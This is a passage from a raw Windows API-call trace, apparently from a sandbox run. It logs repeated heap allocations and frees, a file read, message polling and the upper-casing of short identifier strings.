hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ed020 [0210.820] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.820] ReadFile (in: hFile=0x520, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x99c9, lpOverlapped=0x0) returned 1 [0210.822] ReadFile (in: hFile=0x520, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x99c9) returned 0x37d0050 [0210.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x99c9) returned 0x2a8a938 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x99c9) returned 0x37d0050 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.827] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x99c9) returned 0x37d0050 [0210.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x99c9) returned 0x2a94310 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0210.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.829] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0210.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0210.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.833] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0210.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 